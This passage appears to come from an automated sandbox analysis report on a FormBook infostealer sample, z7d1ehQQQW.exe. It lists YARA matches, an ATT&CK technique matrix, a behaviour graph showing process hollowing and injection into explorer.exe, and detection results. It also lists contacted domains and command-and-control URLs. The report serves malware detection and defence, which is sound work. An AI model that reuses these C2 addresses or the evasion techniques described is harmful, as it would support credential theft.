            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\z7d1ehQQQW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.z7d1ehQQQW.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000000.699728442.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917024748.0000000000930000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.676864808.0000000003BE9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735760553.00000000017D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917376978.0000000002990000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735028940.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.715863161.0000000006BF4000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.735825753.0000000001810000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing13Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 491384 Sample: z7d1ehQQQW.exe Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 31 www.healthyweathorganics.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 8 other signatures 2->45 11 z7d1ehQQQW.exe 3 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\z7d1ehQQQW.exe.log, ASCII 11->29 dropped 57 Tries to detect virtualization through RDTSC time measurements 11->57 59 Injects a PE file into a foreign processes 11->59 15 z7d1ehQQQW.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 33 www.noseainsight.com 18->33 35 www.dorotajedrusik.com 18->35 37 5 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 cscript.exe 18->22         started        signatures11 process12 signatures13 49 Self deletion via cmd delete 22->49 51 Modifies the context of a thread in another process (thread injection) 22->51 53 Maps a DLL or memory area into another process 22->53 55 Tries to detect virtualization through RDTSC time measurements 22->55 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            z7d1ehQQQW.exe25%VirustotalBrowse
            z7d1ehQQQW.exe13%ReversingLabsWin32.Trojan.Pwsx

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.z7d1ehQQQW.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            td-balancer-euw2-6-109.wixdns.net0%VirustotalBrowse
            noseainsight.com5%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.urwpp.deold0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.founder.com.cn/cn;0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/-czt0%Avira URL Cloudsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cnp0%URL Reputationsafe
            http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47100%Avira URL Cloudmalware
            http://www.jiyu-kobo.co.jp/10%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/f0%Avira URL Cloudsafe
            www.odysseysailingsantorini.com/cmsr/0%Avira URL Cloudsafe
            http://www.jiyu-kobo.co.jp/s-10%Avira URL Cloudsafe
            http://www.carterandcone.comw.c0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.ascendercorp.com/typedesigners.html0%URL Reputationsafe
            https://www.dorotajedrusik.com/cmsr?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR%2F3kPtojHfoDwxQoDiPWi0%2FzmWd0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.de0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.fontbureau.co0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/G0%URL Reputationsafe
            http://www.urwpp.deF0%URL Reputationsafe
            http://www.carterandcone.comn-uL0%Avira URL Cloudsafe
            http://www.tiro.comlic0%URL Reputationsafe
            http://www.carterandcone.comCe0%Avira URL Cloudsafe
            http://www.carterandcone.comt0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.dorotajedrusik.com/cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Ad0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.monotype.0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/i0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/f0%URL Reputationsafe
            http://www.tiro.com0K0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            td-balancer-euw2-6-109.wixdns.net
            		35.246.6.109
            		truefalseunknown
            noseainsight.com
            		34.102.136.180
            		truefalseunknown
            www.healthyweathorganics.com
            		47.91.170.222
            		truetrue
              		unknown
              www.dorotajedrusik.com
              		unknown
              		unknowntrue
                		unknown
                www.noseainsight.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://www.noseainsight.com/cmsr/?jtxXAR=f6Ad&4h0XO=aWr8NZzAm1//W065YDaH8MvMe5V7nlKazoNvd1fDio5dOX3Vx686XIFmrsqZJNrwHW47false
                  • Avira URL Cloud: malware
                  		unknown
                  www.odysseysailingsantorini.com/cmsr/true
                  • Avira URL Cloud: safe
                  		low
                  http://www.dorotajedrusik.com/cmsr/?4h0XO=cv8nmsgju4p54IaZtWrlOCmFaMIR/3kPtojHfoDwxQoDiPWi0/zmWdCsSN34zRZDM7Yr&jtxXAR=f6Adfalse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.urwpp.deoldz7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.fontbureau.com/designersGz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                    		high
                    http://www.fontbureau.com/designers/?z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bThez7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?z7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.com/designersWz7d1ehQQQW.exe, 00000000.00000003.659553696.0000000005B00000.00000004.00000001.sdmpfalse
                          		high
                          http://www.tiro.comz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          http://www.founder.com.cn/cn;z7d1ehQQQW.exe, 00000000.00000003.654997513.0000000005AFE000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.fontbureau.com/designersz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.664218437.0000000005B00000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.658968542.0000000005AFF000.00000004.00000001.sdmp, z7d1ehQQQW.exe, 00000000.00000003.657880283.0000000005AFE000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/Oz7d1ehQQQW.exe, 00000000.00000003.657716958.0000000005AFE000.00000004.00000001.sdmpfalse
                              		high
                              http://www.goodfont.co.krz7d1ehQQQW.exe, 00000000.00000002.680790183.0000000006D62000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comz7d1ehQQQW.exe, 00000000.00000003.655576379.0000000005AFF000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designerses-es_tradnl;z7d1ehQQQW.exe, 00000000.00000003.657817317.0000000005AFE000.00000004.00000001.sdmpfalse
                                		high
                                http://www.jiyu-kobo.co.jp/-cztz7d1ehQQQW.exe, 00000000.00000003.656255820.0000000005ADB000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
